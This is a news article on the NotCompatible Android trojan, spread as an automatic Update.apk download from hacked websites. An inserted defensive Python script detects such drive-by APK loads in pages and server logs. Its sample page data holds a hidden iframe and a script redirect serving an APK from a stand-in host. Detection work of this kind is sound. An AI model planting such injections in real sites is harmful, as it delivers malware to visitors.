Android malware infecting through 'legitimate websites'

Mobile trojans turn phones into proxies

Lookout Mobile Security identified an industry first this Wednesday: a malicious Android package delivered as a drive-by download from hacked, otherwise legitimate websites.

The trojan, called NotCompatible, arrives disguised as an update file (Update.apk) that the compromised site pushes to the phone's browser automatically. The download needs no interaction, but installing it still requires the user to confirm the install, and the handset must be set to allow apps from unknown sources, since the file does not come from the official Android market.

Once installed and running, the trojan acts as a TCP relay: it forwards traffic through the phone, so that connections the attacker initiates appear to come from the victim's device and its network, in effect turning the handset into a proxy.
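Two checks a site operator can run against the mechanism described above, as an added example that is not Lookout's or the article's own code. It assumes only what the text states: a compromised site automatically hands Android visitors an APK (Update.apk). The first function scans a fetched page for anything that would load an .apk URL without a click (iframe or frame src, meta refresh, script-driven location change); the second scans common/combined-format web server access logs for requests that served or redirected to an .apk. The page body, hostnames and log lines are constructed sample data, not from the incident.

```python
import re
from html.parser import HTMLParser

# Constructed sample data (not from the incident): a page an operator might
# fetch from their own site, and a few access-log lines.
SAMPLE_HTML = """<html><body>
<p>Welcome to our site</p>
<meta http-equiv="refresh" content="5;url=/news.html">
<iframe src="http://cdn.example.invalid/Update.apk" width="1" height="1" style="visibility:hidden"></iframe>
<script>if (navigator.userAgent.indexOf("Android") > -1) { location.href = "/files/Update.apk?v=2"; }</script>
</body></html>"""

SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 4.0.4)"',
    '203.0.113.7 - - [02/May/2012:10:00:02 +0000] "GET /Update.apk HTTP/1.1" 200 221184 "http://www.example.invalid/index.html" "Mozilla/5.0 (Linux; Android 4.0.4)"',
    '198.51.100.9 - - [02/May/2012:10:00:05 +0000] "GET /files/Update.apk?v=2 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"',
    '198.51.100.10 - - [02/May/2012:10:00:09 +0000] "GET /Update.apk HTTP/1.1" 404 210 "-" "curl/7.22.0"',
    '192.0.2.4 - - [02/May/2012:10:01:00 +0000] "GET /style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 6.1)"',
]

# An .apk path, optionally followed by a query string or fragment.
APK_RE = re.compile(r"\.apk(?:[?#].*)?$", re.IGNORECASE)


def _is_apk_url(url):
    return bool(APK_RE.search(url.strip()))


class _AutoLoadScanner(HTMLParser):
    """Collect URLs a browser would fetch without a click: iframe/frame src,
    meta refresh targets, and location assignments inside <script>."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("iframe", "frame") and a.get("src"):
            self.hits.append((tag, a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.hits.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            # Script bodies arrive as raw text; look for location changes.
            for m in re.finditer(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", data):
                self.hits.append(("script", m.group(1)))


def find_apk_autoloads(html):
    """Return (vector, url) pairs for every automatic load of an .apk URL."""
    scanner = _AutoLoadScanner()
    scanner.feed(html)
    return [(vector, url) for vector, url in scanner.hits if _is_apk_url(url)]


# Common/combined log format; the referrer and user-agent fields are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)


def find_apk_downloads(log_lines):
    """Flag requests that served an .apk (200) or redirected to one (3xx).
    On a site that never ships Android apps, any hit is worth investigating."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if _is_apk_url(path) and m.group("status") in ("200", "301", "302", "303", "307"):
            hits.append((m.group("ip"), path, int(m.group("status")), m.group("ua") or ""))
    return hits


if __name__ == "__main__":
    for vector, url in find_apk_autoloads(SAMPLE_HTML):
        print(f"page would auto-load an APK via {vector}: {url}")
    for ip, path, status, ua in find_apk_downloads(SAMPLE_LOG):
        print(f"{ip} fetched {path} -> {status} ({ua})")
```

On the sample page the meta refresh points at an ordinary HTML file and is ignored, while the hidden iframe and the Android-only script redirect are both reported; in the sample log the 404 for a nonexistent Update.apk is dropped, but the served file and the redirect are flagged. Both checks key only on the .apk extension, so an injected script that builds the URL at runtime would need a rendered-DOM scan rather than this static one.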

The URLs of the infected sites have not yet been released, and the number of affected domains is still disputed.

Lookout argues that these sites number in the tens; Symantec claims thousands could be compromised.

The purpose of this apparently "well-written and stable" malware is also unknown, though Lookout speculates that the attacks are aimed at enabling anonymous hosting for criminal activity.

"There are a couple of ways [the hackers] can profit from this," said Kevin Mahaffrey, co-founder and CTO of Lookout Security. "One is general online fraud. The other is targeted attacks against enterprises."

Lookout said it has not seen any attacks aimed at specific companies, but is tracking purchasing activity related to the trojan.

Ice Cream Frontier

Hacked websites are old news, but NotCompatible could mark the start of a new wave of Android malware distributed through them.

According to Mahaffrey, "This is the first time that [hackers] have used legitimate websites to serve Android malware," though it's far from being the first downloadable, Android-specific trojan.

"We see Android malware all the time," added Mahaffrey, "but it's usually served using social engineering."

And it is no surprise that hackers are turning their attention to these devices. With the recently unveiled Samsung Galaxy S3 hitting markets later this month, the Android platform is poised to take 50 percent of the mobile market.

Lookout is still investigating NotCompatible, but is using this attack to begin adapting to the changing landscape of mobile device vulnerabilities.

For now, Android phone manufacturers may find solace only in the timeless words of the Notorious B.I.G.: "Mo' money, mo' problems."